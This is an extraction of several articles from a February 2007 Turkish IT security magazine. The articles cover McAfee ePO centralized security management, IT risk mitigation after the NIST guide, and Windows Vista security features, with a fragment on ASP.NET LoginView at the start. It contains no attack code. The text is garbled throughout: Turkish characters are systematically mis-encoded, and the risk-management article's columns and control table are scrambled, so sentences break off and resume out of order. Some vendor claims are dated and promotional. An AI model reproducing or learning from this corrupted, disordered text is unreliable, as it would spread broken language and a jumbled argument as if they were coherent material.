sunmak isteyebilirsiniz. Örnek vermek gerekirse anonim bir kullan›c›ya ana sayfan›zda bir login kontrolü gösterirken kay›tl› bir kullan›c› için “hoflgeldin” mesaj› vermek isteyebilirsiniz. Bu gibi durumlarda LoginView iflinizi oldukça kolaylaflt›racakt›r. Loginview; AnonymousTemplate ve LoggedInTemplate olmak üzere iki flablon içerir. Kul- 08 beyazflapka flubat 2007 flubat 2007 beyazflapka 09 Coflkun KAM‹LO⁄LU [email protected] McAfee Sistem Güvenlik Yönetimi cAfee ePO (Event Policy Orchectrator) tüm McAfee sistem güvenlik yaz›l›mlar›n›n yönetilebildi¤i bir platformdur. Yaklafl›k 250.000 istemci ve sunucunun ayn› anda yönetilebilmesine olanak tan›yan bu güvenlik platformu, sistem güvenlik yaz›l›mlar›n›n uzak kurulumunu, güncellenmesini, ayarlanmas›n› ve raporlama ifllemlerinin tek bir noktadan yap›labilmesini sa¤lar. M Windows 2000 ve 2003 sunucular› üzerinde çal›flabilen güvenlik yönetimi yaz›l›m› üç farkl› birimden oluflur. ePO agent: Yönetimi yap›lacak tüm istemci ve sunuculara kurulmas› gereken bu birim, uzak noktan›n ePO sunucu ile irtibat›n› sa¤lar. “Push” teknolojisi kullan›larak uzak birimlere yüklenebilir. ePO sunucu: ePO yönetim platformunun ana birimidir ve tüm uzak yüklemeler, yüklenecek güvenlik yaz›l›mlar›n›n konfigürasyonu ve güncelleme ifllemleri ePO sunucu üzerinde yarat›l›r. Veritaban›: Yap›lan tüm konfigürasyonlar ve raporlar MS SQL 2000, 2005 veya MSDE veritaban›nda tutulur. ePO agent yaz›l›m› yaklafl›k 1.5MB boyutunda küçük bir programd›r ve yönetimi yap›lacak sunucu ve istemcilere Domain kullan›c› ad› ve flifresi kullan›larak uzaktan Push teknolojisiyle yüklenebilir. Yükleme tamamland›ktan sonra agent, belirli aral›klarla ePO sunucuyla ba¤lant›ya geçer ve yeni oluflturulan görevleri al›r/uygular. Push teknolojisinin haricinde agent, login script, ghost imaj ve do¤rudan yükleme gibi teknolojiler kullan›larak da uzak sistemlere yüklenebilir. ePO sunucu platformun ana merkezidir ve tüm ifllemler bu platform üzerinden gerçeklefltirilir. Uzak sistemlere bir kez agent yaz›l›m› kurulduktan sonra tüm McAfee sistem güvenlik yaz›l›mlar› bu merkezi noktadan kurulabilir, kald›r›labilir, güncellemeleri yap›labilir veya tüm sistemler için, sistem gruplar› için, tek bir sistem için farkl› konfigürasyonlar yap›labilir. Yine istenildi¤inde kolayl›kla bu konfigürasyonlar de¤ifltirilip uzak sistemlere uygulanabilir. McAfee ePO güvenlik yönetimi yaz›l›m› kullan›larak yönetimi yap›labilecek yaz›l›mlar afla¤›da s›ralanm›flt›r. McAfee ViruScan 4.51, 7.0, 7.1, 8.0 ve 8.5. Sunucu ve istemcilerin virüs güvenli¤inden sorumludur. Buffer Overflow korumas› da içeren ürün s›f›r›nc› gün güvenli¤i sa¤lar ve henüz yamas› olmayan veya temin edilemeyen Buffer Overflow aç›klar› için koruma sa¤lar. Ürünün son güncel versiyonu olan 8.5 versiyonunda sistem belle¤inde saklanan Rootkit’lere karfl› koruma özelli¤i getirilmifltir. Registry, dosya ve port bazl› k›s›tlamalar yap›labilir ve bir virüs salg›n› s›ras›nda ek önlemler al›narak Virüs veya Worm gibi zararl› yaz›l›mlar›n yay›lmalar›n› engelleyebilir. McAfee Anti-Spyware 8.0, 8.5. Spyware ve Adware gibi is- tenmeyen yaz›l›mlar›n sistemlerden uzak tutulmas›n› sa¤lar. Registry taramas› ve çerez taramas› bu modül taraf›ndan gerçeklefltirilir. McAfee Netshield. Novell Sunucular üzerinde koruma sa¤layan bu ürün Novell Netware 6.5, Netware 6.0 ve Netware 5.1 üzerine kurulabilir. Gerçek zamanl› (OnAccess) deste¤i olan ürün Novell Sunuculara karfl› düzenlenecek DDoS (distributed denial of service) ataklar›na karfl› sistem güvenli¤i sa¤lar. McAfee Groupshield Microsoft Exchange 2000 & 2003 ve Lotus domino 5.0, 6.0, 6.5, 7 e-posta sunucular için gelifltirilmifl olan bu yaz›l›m e-posta yoluyla sistemleri tehdit eden unsurlara karfl› Anti-virüs/Anti-Spam korumas› sa¤lar. ‹çerik filtrelemesi ile gelen e-postalarda oldukça detayl› tarama yap›labilir. Lotus e-posta sunucu ürününün Windows deste¤i oldu¤u gibi, Solaris ve AIX deste¤i de mevcuttur. McAfee LinuxShield Linux sistemlerin korumas› için kullan›l›r. Gerçek zamanl› (On-Access) tarama deste¤i olan LinuxShield lokal arayüz veya ePO üzerinden yönetilebilir. McAfee SecurityShield Microsoft ISA 2000, 2004 ve 2006 güvelik duvar› üzerine kurulabilen SecurityShield yaz›l›m› gateway korumas› sa¤lar. SMTP, HTTP ve FTP üzerinden gelebilecek tehditler henüz a¤a girmeden engellenebilir. Virüs güvenli¤i haricinde ileri seviyede içerik filtreleme yine SecurityShield üzerinde etkinlefltirilebilir. McAfee Spamkiller modülü ile Spam korumas› yine bu ürünle sa¤lanabilir. 10 beyazflapka flubat 2007 McAfee PortalShield Microsoft Sharepoint 2001,2003 ve Sharepoint Services yaz›l›mlar› üzerinde koruma sa¤lar. Yaklafl›k 300 doküman tipi desteklenir ve bu dokümanlarda virüs korumas› ve içerik filtrelemesine olanak tan›n›r. McAfee Host Intrusion & Protection. Kurulumu ve yönetimi ePO sunucu üzerinden yap›labilen bir baflka güvenlik ürünü de Host Intrusion & Prevention’d›r. Ürün Microsoft Windows NT 4.0, 2000, 2003, XP iflletim sistemlerine kurulabilir ve bu sistemlere yap›labilecek uzak veya lokal sald›r›lara karfl› korunmas›n› sa¤lar. Entegre desktop firewall ile tek bir noktadan güvenlik duvarlar› kurallar› oluflturulabilir ve sistem kümelerine tek bir noktadan uygulanabilir. Çal›flt›r›lmas› istenmeyen program veya dosya uzant›lar› Application Blocking özelli¤i ile sa¤lanabilir. Fingerprint özelli¤i sayesinde dosyan›n ad› de¤ifltirilse bile çal›flt›r›lmas›na engel olunabilir. USB portlar kullan›larak sisteme Flash bellek entegre edilmesi ve dosyalar›n firma d›fl›na ç›kar›lmas› engellenebilir. Yaklafl›k 500 atak imzas›n›n destek verildi¤i üründe ayr›ca sezgisel (Behavior) tabanl› koruma da mevcuttur. McAfee SCM (Secure Content Management ) Gateway korumas›. Donan›m tabanl› olan bu ürün Gateway de SMTP, FTP, HTTP, HTTPS, POP3 ve ICAP protokolleri üzerinden gelebilecek tehditleri ortadan kald›r›r. Ürün Virüs, Spyware, Adware, Spam gibi tehditlere karfl› koruma sa¤lad›¤› gibi URL ve içerik filtreleme yap›labilmesine de olanak sa¤lar. Bridge modunda çal›flabilen cihazlar a¤da herhangi bir de¤ifliklik yap›lmadan entegre edilebilir. E-posta içerisinde filtreleme yap›la- flubat 2007 beyazflapka 11 McAfee Sistem Güvenlik Yönetimi bildi¤i gibi 50’den fazla dosya içerisinde de bu tip içerik filtrelemesine olanak sa¤lar. %97 gibi baflar›l› bir Spam yakalama oran›na sahip ürün Spam için McAfee taraf›ndan gelifltirilmifl kurallar› her 5 dakikada bir güncelleyebilir. McAfee Policy Enforcer McAfee Network Admission Control ürünü yine ePO üzerinden yönetilebilir. ePO agent yüklü olan sistemlerde ePO sunucu üzerinden yarat›lan politika uygulanabilir ve sistemlerin a¤a girifl yapabilmesi için sahip olmas› gereken minimum güvenlik seviyesi, sunucu veya istemcilerde lokal olarak uygulanabilir. Sistem istenilen seviyede de¤ilse TDI driver kullan›larak sistemin a¤ ba¤lant›s› lokal olarak kesilir ve sadece iyilefltirme portal›na gitmesine izin verilir. Sistem bu portalda istenilen güvenlik seviyesine ç›kar›ld›ktan sonra a¤ ba¤lant›s› yap›lmas›na izin verilir. ePO agent yüklü olmayan sistemlerin kontrolü için uzak tarama ve Switch enforcement yap›labilir ve bu tip sistemlerin switch üzerinde oluflturulan karantina VLAN’lar›na at›lmas› ve iyilefltirmelerin bu VLAN’da yap›lmas› sa¤lan›r. Ürün ayr›ca Cisco Trust Agent 2.0 yaz›l›m›n›nda uzak yüklemesinin yap›lmas›n› sa¤layabilir ve Access Control Server ile konuflarak sistemlerin a¤a al›n›p al›nmamas›na karar verebilir. McAfee Citadel Henüz entegrasyon aflamas›nda olan bu ürün otomatik yama yönetimi, varl›k yönetimi ve risk yönetiminin ePO üzerinden yap›labilmesine olanak tan›yacakt›r. McAfee Data Loss Prevention (DLP) Bilgi s›z›nt›s› (Data Leakage) ürünü entegrasyon aflamas›ndad›r. Sistemlerden, 12 beyazflapka flubat 2007 Kopyalama, e-posta, floppy/CD/USB gibi cihazlar kullan›larak veya ç›kt› almak gibi yöntemler kullan›larak yap›labilecek s›z›nt›lar McAfee DLP ürünü kullan›larak engellenebilir. Yukar›da bahsedilen tüm sistemler için farkl› grafik ve text raporlama imkânlar› sunulmakta ve bu raporlar›n oluflturulabilmesi için ihtiyaç duyulan veri SQL sunucuda tutulmaktad›r. Bu sunucu ePO ile ayn› sistem üzerinde olabildi¤i gibi uzak bir noktada hali haz›rda kullan›lmakta olan bir SQL sunucuda olabilir. McAfee ePO yönetim platformunda kullan›c› say›s› ne kadar fazla olursa olsun sadece tek bir ePO yönetim yaz›l›m›na ihtiyaç duyulmaktad›r. Farkl› co¤rafi bölgelerdeki sistemlerin güvenlik yönetimi, yaz›l›m kurulumu veya güncelleme ifllemlerinin düflük h›zl› WAN ba¤lant›lar› üzerinden yap›lmamas› için McAfee, Superagent özelli¤ini gelifltirmifltir. Herhangi bir agent’›n sadece fonksiyonalitesini de¤ifltirerek bu özellik sa¤lanabilir ve da¤›t›k repository özelli¤i kullanarak uzak kurulumlar›n veya güncellemelerin WAN ba¤lant›lar› üzerinden de¤il o co¤rafi konumdan sorumlu superagent’in kendi repository’si kullan›larak lokal olarak yap›lmas› sa¤lanabilir. Örnek verecek olursak, 150 kullan›c›l› bir uzak lokasyonda Antivirüs yaz›l›m› kurulmak istenirse normal koflullarda ayn› yaz›l›m 150 kez gönderilmek zorundad›r. Ancak Superagent, ePO sunucunun sahip oldu¤u repository’nin bir kopyas›n› tuttu¤u için kurulumlar ve güncellemeler o bölgede ki lokal bir Superagent repository’si üzerinden yap›labilir. Yönetimi yap›lacak sistemler ePO üzerinde yarat›lacak gruplar›n alt›na kümelenmekte ve sistemler bu gruplar›n alt›na al›nmaktad›r. Bu ifllem yap›l›rken en çok kullan›lan yöntem Active Directory entegrasyonudur. Active Directory içersinde yarat›lan tüm organizasyonel birimler LDAP sorusu yap›larak görülebilmekte ve sistemler Active Directory’den yarat›lan gruplar›n alt›na al›nabilmektedir. ‹stenirse Active Directory organizasyonel birimler oldu¤u gibi ePO ya al›nabilir. Hangi AD OU’nun hangi ePO grubuna map edildi¤i bilgisi saklanabilir ve bir görev olarak de¤iflik zamanlarda otomatik olarak çal›flabilir. Böylece AD’ye yeni eklenen sistemler otomatik olarak ePO ‘da yarat›lan gruplara da al›nabilir. Sistemlerde oluflan olaylar (Virüs bulunmas›, temizlenmesi, güncellenme yap›lmas›, kullan›c› taraf›ndan ürünlerin silinmeye çal›fl›lmas› vs.) ePO agent taraf›ndan XML dosyalar›na kaydedilir ve belirli aral›klarla ePO sunucusuna gönderilir. ePO sunucusu XML dosyalar›n› parse eder ve bunlar› veritaban›na yazar. Sistem yöneticileri baz› durumlardan haberdar olmak isterse ePO uyar› sistemini kullanabilirler. Yaklafl›k 100 den fazla olay için farkl› tan›mlamalar yap›labilir ve sistem yöneticileri e-mail, snmp trap, Pager gibi yöntemlerle bu tip olaylardan haberdar olabilirler. Sistemlerin Virüs güvenli¤inin otomatize edilebilmesi aç›s›ndan McAfee farkl› baz› teknolojiler gelifltirmifltir. Bunlardan biri Rogue System Detection‘d›r ve Network’de üzerinde agent bulunmayan sistemlerin tespit edilmesi ve otomatik olarak bu sistemlere agent yüklenmesinden sorumludur. Sisteme bir kez agent’›n yüklenmesi demek arkas›ndan istenilen güvenlik yaz›l›mlar›n›n ve bunlar›n güncellemelerinin yüklenmesi anlam›na geldi¤i için Domain’in bir parças› olan sistemler için tamamen otomatize edilmifl kurulum ve konfigürasyon sa¤lanmas› anlam›na gelir. RSD her bir subnet’e Network’ü dinleyen yaz›l›m tabanl› sensor’lerin kurulmas› ile çal›flabilmektedir. Bu sensor trafi¤i dinler ve üzerinde agent yaz›l›m› olmayan sistemleri bulup bunlar› ePO sunucusuna haber verir. ePO sunucu bu sistemleri ait oldu¤u gruplara al›r ve otomatik olarak agent gönderimine bafllar. Agent yüklendikten sonra ePO sunucu ile ba¤lant›ya geçer ve kurulmas›n› istedi¤imiz yaz›l›mlar›, bu yaz›l›mlar›n güncellemelerini veya güncellemelerin hangi lokasyondan al›naca¤› gibi birçok kural› al›r ve bunlar› uygulamaya koyulur. Ayn› lokasyonda birden fazla subnet mevcut ise ayn› sunucu&istemci üzerine her bir subnet için bir Ethernet kart› tak›lmak flart›yla sensor say›s› düflürülebilir. McAfee ePO güvenlik yaz›l›m› düflük kullan›c› say›s›ndan oldukça yüksek kullan›c› say›lar›na kadar her türlü sisteme kolayl›kla entegre edilebilir ve sistem yöneticilerinin yükünü minimum seviyeye indirebilir. Geliflmifl raporlama seçenekleri ile sistemlerin güvenli¤inin ne seviyede oldu¤u fazla efor harcamadan tespit edilebilir ve çok k›sa zamanda ilgili önlemler al›nabilir. flubat 2007 beyazflapka 13 Bora DAL [email protected] Biliflim Sistemleri ve Risk Yönetimi: Dalgal› denizlere yelken açmak Yaz›n›n ilk bölümünü; www.coldbytes.net/BT_Risk_Yon_b1.pdf adresinden indirebilirsiniz. Risk ‹ndirgenmesi Öncelikle bilinmelidir ki, risk yönetiminin ilk aflamas› olan riskin belirlenmesi süreci ne kadar verimli geçerse geçsin, bir organizasyonun çevresindeki bütün risklerin etkin bir flekilde ortaya ç›kart›lmas›, envanterinin yap›lmas› ve olas› darbenin analizi mümkün de¤ildir. Her zaman fark edilmemifl, gözden kaçm›fl ya da gerçekleflmesi durumunda darbe fliddeti küçümsenmifl ve düflük risk kategorisine konmufl tehditler olacakt›r. Unutulmamal›d›r ki risk yönetiminin amac› bütün riskleri kapsamak de¤il, tehditlerin gerçekleflmesi halinde darbesi organizasyona en çok zarar verebilecek olanlar›n ortaya ç›kart›lmas›d›r. Risk indirgenmesi, risk yönetimi sürecinin ikinci aflamas› olup risk önceliklendirmesi, ölçeklendirmesi ve ard›ndan da söz konusu risk azalt›c› kontrollerin konulmas›d›r. Bir önceki paragrafta anlat›ld›¤› gibi var olan tüm risklerin zarars›z hale getirilmesi mümkün olmad›¤› için risk yönetimi sürecinin kurulmas›n› destekleyen organizasyon yöneticileri, en fiyat-etkin yaklafl›mla organizasyonun operasyonel risklerinin kabul edilir seviyeye indirmeyi hedeflemelidir. Afla¤›da risk indirgenmesi aflamas›nda izlenebilecek yöntemler s›ralanm›flt›r. Risk varsay›m›: Potansiyel riski kabul ederek IT operasyonlar›na, riskleri kabul edilir bir seviyeye söz konusu kontrolleri kurmak suretiyle indirerek devam etmek. Riskten sak›nma: Risk kayna¤›n› ve/veya sonuçlar›n› ber- Önleyici: Süreçlerin aksamas›n› veya yanl›fl yönde hareket Organizasyonlar›n hangi çözümü ya da çözümleri seçecekleri faaliyet gösterdikleri endüstriye ve kendilerine özel koflullara göre de¤iflir. Her zaman amaç öncelikli olarak organizasyonun devaml›l›¤›n› tehdit edecek ve söz konusu tehditlerin gerçekleflmesi durumunda kay›plara yol açabilecek risklerin engellenmesi olmal›d›r. Risk indirgenmesinde izlenecek koflullar ve uygulamalar için farkl› olsa bile genel hatlar›yla sistemlerin mimarisi ve tehdit kayna¤› ile do¤rudan ilgilidir. Yine temel olarak unutulmayacak nokta tehdidin her zaman var oldu¤u, ancak uygulanabilmek için sistemlere gereksinim duydu¤udur. Öncelikle riskin d›fl kaynaklar›, sonra da sistemlerde faydalanabilinecek zay›fl›klar belirlendikten sonra riskin var olup olmad›¤› sonucuna var›lmal›d›r. Devam›nda sald›ran›n perspektifinde, yap›lacak kazanç-çaba analizini ve bizim aç›m›zdan ortaya ç›kart›lacak söz konusu kay›p beklentisini kapatmak için at›lacak ad›mlar›n bize maliyetini göz önüne alarak riskin kabul edilebilir ya da edilmez oldu¤unu belirleyebiliriz. Destekleyici: Baflka kontrollerin var olmas›na ve süreçlerin iflleyifli yönünde kurulabilmesine olanak tan›r. etmesini engeller. Risk yönetimi söz konusu olunca bahsetmemiz gereken kontroller 3 alanda tasarlanmal›d›r. 1. Teknik 2. ‹dari 3. Operasyonel Haz›rlad›¤›m tabloda baz› örnek kontroller ve ilgili olduklar› alanlar belirtilmifltir. Bu tabloya organizasyona özel eklemeler de yap›labilir. Kontrollerin süreçlere eklenmesi s›ras›nda en çok dikkate al›nmas› gereken nokta maliyet-yarar analizidir. En baflta da Alan› Kontrol turu Fark edici ve düzeltici Biliflim sistemleri kontrolleri Organizasyonlar›n teknik, yönetim ve operasyonel güvenlik alanlar›nda, organizasyonun bafl›na gelebilecek ve zarar verebilecek tehditlerin oluflmas›n› önlemek ya da olufltuktan sonra zararlar›n› azaltmak için biliflim sistemleri kontrollerinden faydalanmalar› gerekmektedir. Önleyici Teknik B Risk aktarma: Sigorta ve benzeri çözümler kullanarak riski baflkalar›na devretme. Kontrol, süreçlerin kendilerinden beklendi¤i gibi çal›flmalar›n› sa¤layan teyit noktalar› olarak görülebilir. Genel olarak kontroller kendi aralar›nda 3’e ayr›l›r: Destekleyici Fark edici ve düzeltici Fark edici ve düzeltici: Süreçler beklenmedi¤i gibi ifllemeye bafllad›¤›nda fark edilmesini sa¤lar ve düzeltici yönde harekete geçer. ‹dari ir önceki makalede aç›klamaya çal›flt›¤›m risk, tehdit gibi kavramlardan ve risk yönetimi sürecinin kurulmas›na yönelik ilk aflamadan sonra bu yaz›da 2. ve 3. aflamalar olan Risk ‹ndirgemesi(Risk Mitigation) ve Gözden Geçirme ve Yeniden Belirleme (Evaluation and Re-assessment) konular›na de¤inilecektir. NIST Risk Management Guide Önleyici taraf ederek riskten kaç›nma. Risk k›s›tlamas›: Darbenin olumsuz etkilerini aza indirge- Fark edici ve düzeltici Önleyici Risk planlamas›: Risk indirgeme plan› yaparak kontrolleri önceliklendirme, kurma ve devam ettirme yoluyla riski yönetme. Araflt›rma ve anlama: Kay›p riskini azaltarak zay›fl›¤› veya tehdidi önleyici kontroller araflt›rarak düzenlenmesi 14 beyazflapka flubat 2007 Operasyonel yen kontroller (önleyici ve fark edici) yerlefltirerek risklerin olumsuz etkisini k›s›tlamak. belirtildi¤i gibi e¤er bir kontrolün bir sürece eklenmesinin maliyeti, o sürecin beklenmedi¤i gibi gitmesi durumunda oluflacak zarardan fazlaysa, gereklili¤i iki defa de¤erlendirilmelidir. Unutulmamal›d›r ki eklenen kontroller asla riskleri tamamen kapatmaz, en iyimser yaklafl›mla minimal seviyeye indirir. Gözden geçirme ve yeniden belirleme Risk yönetimini oluflturan ilk iki aflaman›n sonuçlar›n›n organizasyonun o anki halini yans›tt›¤›n› unutmamak laz›md›r. Organizasyonun sürekli de¤iflti¤i, bununla beraber, süreçlerin, uygulamalar›n ve altyap›n›n da sürekli de¤iflim halinde oldu¤u gözlemlenebilir. Bin bir u¤raflla (ya da kolayca) kurulmufl bir risk yönetimi sürecinin, organizasyonun de¤iflimine ayak uydurmas› hayati önem tafl›maktad›r. Bunun için periyodik olarak de¤ifliklikler ele al›nmal›, ilk iki aflama gözden geçirilmeli ve yeniden yap›land›r›lmal›d›r. Bunu yaparken yeni yasal gereksinimler de gözden geçirilmeli, risklerin tehdit seviyeleri gerekirse de¤ifltirilmelidir. Kontrol Sistem kay›tlar›n›n incelenmesi ‹zinsiz giriflleri fark etme ve uygun hareket etme mekanizmas› Sistem veri bütünlü¤ü analizi Güvenli geçmifl zamana dönme Virüsleri tan›mlama ve engelleme Sistem kimlik do¤rulamas› Kullan›c› yetkilendirme ‹nkar edilemezlik Eriflim kontrolleri Güvenli iletiflim ‹fllem gizlili¤i Kullan›c›, süreç ve bilgi kaynaklar›n›n ay›rt edilebilmesi Kriptografik anahtar yönetimi Güvenlik yönetimi Personelin ifle al›m öncesi araflt›r›lmas› Var olan kontrollerin gözden geçirilmesi Dönemsel sistem denetimleri Etkin olay-tepki sistemi Gereksinimlere uygun tasarlanm›fl, yönetim taraf›ndan onaylanm›fl ve düzenli olarak test edilmifl güncel is süreklili¤i ve felaket kurtarma plan›. Önemli sistemlere sorumlu atanmas› Güvenlik plan› ve var olan kontrollerin dokümantasyonu Görev ayr›m› ilkesi ve gereksinildi¤i kadar kullan›c› hakki verilmesi Kullan›c›lara güvenlik bilincinin afl›lanmas› ve e¤itim Organizasyon içi fiziksel güvenlik Veri da¤›t›m›n›n kontrollü yap›lmas› Veri medyas›n›n elden ç›kart›lma aflamas›nda izlenecek yöntemin belirlenmesi Kritik alanlar›n fiziksel eriflim k›s›tlamalar› Veri iletim yollar›n›n güvenli¤i Gereksinimler do¤rultusunda haz›rlanm›fl veri yedeklenme prosedürü ve bunu destekleyici yaz›l›m ve donan›m. Yede¤in güvenli ve farkl› bir yerde tutulmas› Tafl›nabilir bilgisayar ve PDA deki veri güvenli¤i ile ilgili önlemler Gereksinimler do¤rultusunda ayarlanm›fl yedek güç üniteleri Kritik sistemlerin bulundu¤u ortamlar›n çevresel kontrolleri (nem, isi...) sa¤lanmas› KAYNAKÇA • NIST Risk Management Guide for Information Technology Systems • UK: RMI Risk Management Standard • Wikipedia • ISACA - Control Journal – Makale : Living With Risk Gizlilik Bütünlük Süreklilik flubat 2007 beyazflapka 15 Mehmet ÜNER [email protected] Windows Vista Güvenlik Özellikleri icrosoft taraf›ndan, Kas›m ay›nda kurumsal versiyonlar› ve Ocak ay›nda da kiflisel versiyonlar› piyasaya sürülen Windows Vista, Microsoft’un tarihinde gelifltirdi¤i en büyük IT projesi. Yap›lan yat›r›m, çal›flan kifli say›s› ve geçen süre göz önüne al›nd›¤›nda belki de dünyadaki en büyük IT projesi olmaya aday. Türkiye’de Kas›m ay›ndan beri birçok kurumun kullanmaya bafllad›¤› Windows Vista, Microsoft Zirvesi’ndeki lansman›yla beraber ev kullan›c›lar›yla da buluflmaya bafllad›. M Windows Vista özellikle kullan›c› arayüzü, yönetilebilirlik, bilgiye kolayca ulafl›m ve güvenlik konusunda çok yeni geliflmelere sahip bir iflletim sistemi. Bu yaz›da sadece güvenlik özellikleri üzerinde duruyor olaca¤›z. Güvenlik bak›m›ndan oldukça geliflmifl olan Windows Vista’n›n yeni güvenlik özellikleri 4 ana bafll›k alt›nda toplanabilir (fiekil 1): • • • • flamdöngüsü’nün (SDL) en önemli özelli¤i, daha tasar›m aflamas›nda güvenli¤in ön planda olmas›, kodlama yap›l›rken güvenlik dan›flmanlar›n›n kodlamay› kontrol etmesi ve kodlamadan sonra da güvenlik testleri/de¤erlendirmelerin de ürün gelifltirmenin bir parças› olmas›d›r. SDL, sonuçlar›n› “Windows Server Service Pack 1” ve “Windows XP Service Pack 2” ile göstermiflti. Bu paketler iflletim sistemlerini daha güçlü ve güvenli hale getirmiflti. fiimdi Vista, tamamen SDL ile yaz›lan bir iflletim sistemi oldu¤u için güvenlik bak›m›ndan Microsoft’un ç›kard›¤› en güçlü iflletim sistemi durumunda. fiekil -2 Temeller: Mühendislik Güvenli Eriflim Malware ve Sald›r›lara Karfl› Koruma Bilgiyi Koruma Servis güçlendirmesi de Vista’n›n temel güvenlik özelliklerinden biri (fiekil 2). Servisler art›k daha düflük haklarla çal›flt›r›l›yor. Windows servisleri art›k sadece a¤ üzerinde, dosya sisteminde ve kay›t defterinde izin verilen yerlere eriflebiliyor ve servis profilinde olmayan yerlere eriflemiyor. Böylece sald›r›lara karfl› birçok aç›k, en bafltan kapat›lm›fl oluyor. Ayn› zamanda servis bafl›na güvenlik tan›mlay›c›lar› sayesinde servisler kendi haklar›n› koruyabiliyorlar. Windows Vista’n›n Güvenli Eriflim bafll›¤› alt›ndaki en önemli özellikleri ise Kullan›c› Hesab› Kontrolü, geliflmifl Audit yetenekleri ve USB cihazlar›n› daha etkin yönetebilme olarak s›ralanabilir. Birçok kurumun bafl›n› a¤r›tan, kullan›c›lara admin yetkisi verilmesi sonucunda oluflan güvenlik sorunlar› art›k ortadan kalk›yor. Kullan›c›lar art›k standart hesaplar›yla daha fazla ifllem yapabiliyor (time zone, güç ayarlar›, VPN gibi) ve önceden onay verilmifl cihazlar› yükleyebiliyorlar. Bunun d›fl›nda yönetici hakk›na sahip olmalar› gerekti¤inde geçici olarak yönetici seviyesine yükseltiliyor ve ifllem bittikten sonra tekrar standart kullan›c› seviyesine indiriliyor. Böylece kullan›c›n›n onay› olmadan arkaplanda hiçbir fley yüklenemiyor veya çal›flam›yor. Bu özellik arka planda çal›flan zararl› kodlar› tamamen engelleyecek gibi gözüküyor. Normal çal›flanlara ek olarak flirketin IT yöneticileri bile standart kullan›c›larla çal›flabiliyor. Audit k›sm›nda ise alt kategoriler, filtreleme seçenekleri ve geliflmifl kullan›c› deneyimi Windows Vista’n›n sundu¤u yeni özelliklerden. Güvenli Eriflim özelliklerinin önemli bir parças› da USB cihazlar› üzerinde birçok politikan›n hayata geçirebilmesi. Kurumlar›n karfl›laflt›¤› en önemli zorluklardan biri de USB cihazlarla d›flar›ya s›zan kuruma ait kritik bilgiler. Birçok kurum bunu engellemek için bilgisayarlar›ndaki USB portlar›n› tamamen kapatmakta. Bu da USB klavye, fare gibi çevresel fiekil -3 Vista Firewall Güvenlik geliflmelerinin ilk topland›¤› bafll›k Temeller. Temel güvenlikte ilk bahsedilmesi gereken özellik ise Windows Vista’n›n Security Development Lifecycle (Güvenlik Gelifltirme Yaflamdöngüsü) ile yaz›lm›fl ilk iflletim sistemi olmas›. 2001 y›l›nda Bill Gates’in öncülü¤ünde bafllayan Trustworthy Computing (Güvenli Biliflim) hareketi ile Microsoft önceliklerini ve ifl yap›fl tarz›n› tamamen de¤ifltirdi. Bu tarihten sonra Güvenlik, ürün gelifltirmenin her alan›nda ön planda tutulmaya bafllad›. Windows yaz›l›mc›lar› zorunlu güvenlik e¤itimlerinden geçirildi ve iflletim sistemlerinin her bilefleni güvenlik bak›m›ndan ayr› ayr› ele al›nd›. Güvenli Gelifltirme Yafiekil 1 - Windows Vista Güvenlik Özellikleri 16 beyazflapka flubat 2007 flubat 2007 beyazflapka 17 Windows Vista Güvenlik Özellikleri cihazlar›n kullan›m›n› tamamen engellemekte. Windows Vista ile gelen yeni özellikler sayesinde USB girifllerinde IT yöneticilerine tam kontrol sa¤lanm›fl durumda. Yöneticiler art›k isterlerse USB sabit disk, bellek ünitelerini engellerken, USB klavye, fare ve de¤iflik cihazlara izin verebilecekler. ‹nternet ve bilgiye sürekli ba¤l› olma iste¤i art›k hayat›m›z›n vazgeçilmez bir parças›. Ama internet ve bilgiye sürekli ba¤l› olmak, kurumlar› ve kiflileri birçok sald›r›ya aç›k duruma getiriyor. Windows Vista, getirdi¤i ‘malware’ ve sald›r›lara karfl› koruma özellikleri sayesinde bu aç›klar› kapat›yor ve sald›r›lar› önlemek için birçok yeni özellik sunuyor. Bunlar›n en bafl›nda Internet Explorer 7.0, Güvenlik Duvar›, Windows Defender, NAP (Network Acces Protection) ve ASLR (Address Space Layout Randomization) geliyor. Internet Explorer 7.0’›n korumal› modda çal›flma özelli¤i sadece internet taramas› yap›lmas›na izin verir ve yaz›l›m yüklemek gibi ifllemlerin yap›lmas›na izin vermez. “Salt Okunur” modda çal›flma özelli¤i ise, sadece “Temporary Internet Files” dizininin alt›na eriflime izin verir. Böylece internetten gelebilecek güvenlik tehditleri iflletim sisteminin di¤er yerlerine eriflemez. Ayr›ca günümüzde çok büyük bir sorun olan Phishing sald›r›lar›na karfl› da yeni Internet Explorer bir Phishing Filtresi sunmaktad›r. Böylece kullan›c›lar Phishing sitelerine eriflirken ekrana uyar›lar ç›kar ve eriflim engellenir. Phishing Filtresi, veri kayna¤› için global veri kayna¤› a¤›n› kullan›r ve birkaç saatte bir kendini güncellefltirilir. Ayn› zamanda web sayfalar›n›, kullan›c› verisini çalmaya çal›flan sayfalar›n bilinen özelliklerine göre analiz eder ve böy- fiekil -4 NAP (Network Access Protection) lece bir veri kayna¤›na ihtiyaç duymadan da koruma sa¤layabilir. Windows Vista’n›n içinde art›k çift tarafl› bir Güvenlik Duvar› (Firewall) bulunmakta (fiekil 3). Böylece hem içeriye hem de d›flar›ya do¤ru statefull IPv4 ve IPv6 filtreleme yap›labilmekte. Ayn› zamanda d›flar›ya do¤ru uygulama tan›yan bir filtreleme de Windows Vista’n›n sa¤lad›¤› güvenlik özelliklerinden. Yönetim bak›m›ndan ise Güvenlik Duvar› ve IPSec yönetiminin birlefltirilmesi özellikle IT yöneticilerinin iflini çok kolaylaflt›rd›. Spyware, bugün karfl›lafl›lan en büyük güvenlik sorunlar›ndan birisi. Özellikle birçok kurum için spyware sorunu virüs sorunlar›n›n önüne geçmifl durumda. Windows Vista ise spyware’e karfl› içinde Microsoft’un tarihindeki en popüler ürünlerinden biri olan ve birçok kullan›c› taraf›ndan be¤enilen Windows Defender’i bar›nd›r›yor. Windows Defender, spyware gibi istenmeyen yaz›l›mlar› gerçek zamanl› olarak alg›l›yor ve onlar› sistemden temizliyor. Ayr›ca Basit ve kolay kullan›c› arabirimi ile tüm kullan›c›lar için yüksek bir koruma sa¤l›yor. Network Access Protection (NAP) Client, yine Vista’n›n içinde yer alan güvenlik özelliklerinden biri (fiekil-4). NAP, flirket içindeki tüm iletiflimin kimli¤i do¤rulanm›fl, yetkilendirilmifl ve sa¤l›kl› bir flekilde yap›lmas›n› sa¤l›yor. IT yöneticilerinin belirledi¤i güncellemeler, antivirüs program›, firewall program› ve kurallar› olmayan bilgisayarlar›n flirket a¤› içerisine girmesini engelliyor. 